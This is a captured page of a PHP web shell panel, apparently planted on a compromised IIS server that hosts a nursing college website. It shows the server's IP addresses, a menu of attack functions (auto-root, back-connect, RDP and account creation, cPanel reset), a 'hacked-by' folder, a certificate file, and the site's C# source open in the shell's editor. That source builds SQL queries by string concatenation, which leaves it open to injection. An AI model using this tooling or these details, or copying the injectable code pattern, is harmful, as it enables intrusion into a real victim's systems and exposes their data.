Windows NT WIN8053 10.0 build 20348 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: 10.10.28.53 | : 216.73.216.191
Cant Read [ /etc/named.conf ]
8.0.23
sahaiassociates-001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ D ]
[ H ]
h: /
root /
home /
sahaiassociates-001 /
www /
ppscollegeofnursing /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxrwxrwx
Bin
[ DIR ]
drwxrwxrwx
calendar
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
hacked-by-overthrash1337
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
uploads
[ DIR ]
drwxrwxrwx
video
[ DIR ]
drwxrwxrwx
Achievement.aspx
2.92
KB
-rw-rw-rw-
Achievement.aspx.cs
2.62
KB
-rw-rw-rw-
Contact.aspx
4.27
KB
-rw-rw-rw-
Contact.aspx.cs
1.05
KB
-rw-rw-rw-
Default.aspx
14.31
KB
-rw-rw-rw-
Default.aspx.cs
5.47
KB
-rw-rw-rw-
EDefault.aspx
27.06
KB
-rw-rw-rw-
EDefault.aspx.vb
82
B
-rw-rw-rw-
MasterPage.master
32.02
KB
-rw-rw-rw-
MasterPage.master.cs
7.59
KB
-rw-rw-rw-
Pages.aspx
5.95
KB
-rw-rw-rw-
Pages.aspx.vb
79
B
-rw-rw-rw-
TOPPERS.aspx
2.04
KB
-rw-rw-rw-
TOPPERS.aspx.cs
2.18
KB
-rw-rw-rw-
comm.aspx
4.91
KB
-rw-rw-rw-
comm.aspx.cs
10.95
KB
-rw-rw-rw-
font-awesome.min.css
30.6
KB
-rw-rw-rw-
gallery.aspx
2.04
KB
-rw-rw-rw-
gallery.aspx.cs
2.16
KB
-rw-rw-rw-
google54c61c0b2d419343 (1).htm...
53
B
-rw-rw-rw-
google54c61c0b2d419343.html
53
B
-rw-rw-rw-
infrastructure.html
48.84
KB
-rw-rw-rw-
jquery.min.js
85.48
KB
-rw-rw-rw-
liz.php
62.03
KB
-rw-rw-rw-
mandatory-public-discloser.htm...
48.84
KB
-rw-rw-rw-
page.aspx
5.37
KB
-rw-rw-rw-
page.aspx.cs
5.34
KB
-rw-rw-rw-
ppscollegeofnursing.com.pfx
2.93
KB
-rw-rw-rw-
robots.txt
82
B
-rw-rw-rw-
sitemap.xml
2.24
KB
-rw-rw-rw-
skd-mobile-app.html
1.19
KB
-rw-rw-rw-
the-management.html
48.84
KB
-rw-rw-rw-
uploads.zip
60.53
MB
-rw-rw-rw-
web.config
646
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MasterPage.master.cs
using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.UI; using System.Web.UI.WebControls; using System.Data; using System.Data.SqlClient; using System.Configuration; using System.IO; using System.Net.Mail; using System.Net; using System.Web.UI.HtmlControls; public partial class school1_MasterPage : System.Web.UI.MasterPage { string hostName; int idddd; SqlConnection con = new SqlConnection(ConfigurationManager.ConnectionStrings["dbcon"].ConnectionString); protected void Page_Load(object sender, EventArgs e) { if (!IsPostBack) { Session["sid"] ="9"; gttm(); evtttn(); evttt(); ab(); abCCSSS(); aluu(); acad(); abCCSSSrr(); gtt(); if (Session["sid"] == null) { } else { hom.HRef = "default.aspx?id=" + Session["sid"]; hm22.HRef = "default.aspx?id=" + Session["sid"]; Label1.Text = Session["sid"].ToString(); Session["sid"] = "9"; } } } private void aluu() { SqlCommand cmd = new SqlCommand("SELECT distinct(spg) FROM epggs where sid='" + Session["sid"] + "' and pg='" + L7.Text + "'", con); SqlDataAdapter da = new SqlDataAdapter(cmd); DataTable dt = new DataTable(); da.Fill(dt); alu.DataSource = dt; alu.DataBind(); alu2.DataSource = dt; alu2.DataBind(); } private void ab1() { SqlCommand cmd = new SqlCommand("SELECT distinct(spg) FROM epggs where sid='" + Session["sid"] + "' and pg='"+L2.Text+"'", con); SqlDataAdapter da = new SqlDataAdapter(cmd); DataTable dt = new DataTable(); da.Fill(dt); abt.DataSource = dt; abt.DataBind(); AB2.DataSource = dt; AB2.DataBind(); } private void ab() { SqlCommand cmd = new SqlCommand("SELECT distinct(Spg) FROM epggs where sid='" + Session["sid"] + "' and pg='"+L2.Text+"'", con); SqlDataAdapter da = new SqlDataAdapter(cmd); DataTable dt = new DataTable(); da.Fill(dt); abt.DataSource = dt; abt.DataBind(); AB2.DataSource = dt; AB2.DataBind(); } private void abCCSSS() { SqlCommand cmd = new SqlCommand("SELECT distinct(session) FROM facc where sid='" + Session["sid"] + "' and rem='"+m4.Text+"'", con); SqlDataAdapter da = new SqlDataAdapter(cmd); DataTable dt = new DataTable(); da.Fill(dt); // Session["tpr"] = m4.Text; ach.DataSource = dt; ach.DataBind(); AVH2.DataSource = dt; AVH2.DataBind(); } private void evtttn() { SqlCommand cmd = new SqlCommand("SELECT distinct(spg) FROM EIMGG where sid='" + Session["sid"] + "' and pg='" + L6.Text + "'", con); SqlDataAdapter da = new SqlDataAdapter(cmd); DataTable dt = new DataTable(); da.Fill(dt); evt.DataSource = dt; evt.DataBind(); evt2.DataSource = dt; evt2.DataBind(); } private void evttt() { SqlCommand cmd = new SqlCommand("SELECT distinct(spg) FROM epggs where sid='" + Session["sid"] + "' and pg='" + L4.Text + "'", con); SqlDataAdapter da = new SqlDataAdapter(cmd); DataTable dt = new DataTable(); da.Fill(dt); ach.DataSource = dt; ach.DataBind(); AVH2.DataSource = dt; AVH2.DataBind(); } private void abCCSSSrr() { SqlCommand cmd = new SqlCommand("SELECT distinct(spg) FROM epggs where sid='" + Session["sid"] + "' and pg='"+l5.Text+"'", con); SqlDataAdapter da = new SqlDataAdapter(cmd); DataTable dt = new DataTable(); da.Fill(dt); Repeater1.DataSource = dt; Repeater1.DataBind(); Repeater2.DataSource = dt; Repeater2.DataBind(); } private void acad() { SqlCommand cmd = new SqlCommand("SELECT distinct(spg) FROM epggs where sid='" + Session["sid"] + "' and pg='" + L3.Text + "'", con); SqlDataAdapter da = new SqlDataAdapter(cmd); DataTable dt = new DataTable(); da.Fill(dt); acd.DataSource = dt; acd.DataBind(); ACD2.DataSource = dt; ACD2.DataBind(); } private void gtt() { SqlCommand cmd = new SqlCommand("SELECT * FROM SchoolInfo WHERE id='"+Session["sid"]+"'", con); if (con.State == 0) con.Open(); SqlDataReader dr = cmd.ExecuteReader(); if (dr.Read()) { string aa = dr["Id"].ToString(); mob.Text = dr["phone"].ToString(); eml.Text = dr["email"].ToString(); fb.HRef = dr["fb"].ToString(); ins.HRef = dr["ins"].ToString(); lk.HRef = dr["lnk"].ToString(); yt.HRef = dr["yt"].ToString(); HtmlLink favicon = new HtmlLink(); favicon.Attributes["rel"] = "icon"; favicon.Attributes["type"] = "image/x-icon"; // ttl.Text = dr["Schoolname"].ToString(); // Example: dynamic path from a setting, database, or condition favicon.Href = dr["LogoPath"].ToString(); // Or use a dynamic value // Page.Title = dr["Schoolname"].ToString() ; Page.Header.Controls.Add(favicon); logo.ImageUrl = dr["LogoPath"].ToString(); wa.HRef = "https://wa.me/91" + dr["phone"].ToString(); logo.ImageUrl = dr["LogoPath"].ToString(); Image1.ImageUrl = dr["LogoPath"].ToString(); logo2.ImageUrl = dr["LogoPath"].ToString(); logo4.ImageUrl = dr["LogoPath"].ToString(); logo3.ImageUrl = dr["LogoPath"].ToString(); eml1.Text = dr["email"].ToString(); ph.Text = dr["phone"].ToString(); addr1.Text = dr["address"].ToString(); } } private void gttm() { DataTable dt = new DataTable(); SqlDataAdapter da = new SqlDataAdapter(); DataRow dr; SqlCommand cmd = new SqlCommand("SELECT * from dbo.mnu where sid='" + Session["sid"]+ "'", con); da.SelectCommand = cmd; dt = new DataTable(); da.Fill(dt); if (dt.Rows.Count > 0) { m1.Text = dt.Rows[0][1].ToString(); mm1.Text = dt.Rows[0][1].ToString(); m2.Text = dt.Rows[1][1].ToString(); mm2.Text = dt.Rows[1][1].ToString(); m3.Text = dt.Rows[2][1].ToString(); mm3.Text = dt.Rows[2][1].ToString(); m4.Text = dt.Rows[3][1].ToString(); mm4.Text = dt.Rows[3][1].ToString(); m5.Text = dt.Rows[4][1].ToString(); mm5.Text = dt.Rows[4][1].ToString(); m6.Text = dt.Rows[5][1].ToString(); mm6.Text = dt.Rows[5][1].ToString(); m7.Text = dt.Rows[6][1].ToString(); mm7.Text = dt.Rows[6][1].ToString(); l1.Text = dt.Rows[0][0].ToString(); L2.Text = dt.Rows[1][0].ToString(); L3.Text = dt.Rows[2][0].ToString(); L4.Text = dt.Rows[3][0].ToString(); l5.Text = dt.Rows[4][0].ToString(); L6.Text = dt.Rows[5][0].ToString(); L7.Text = dt.Rows[6][0].ToString(); } } }
Close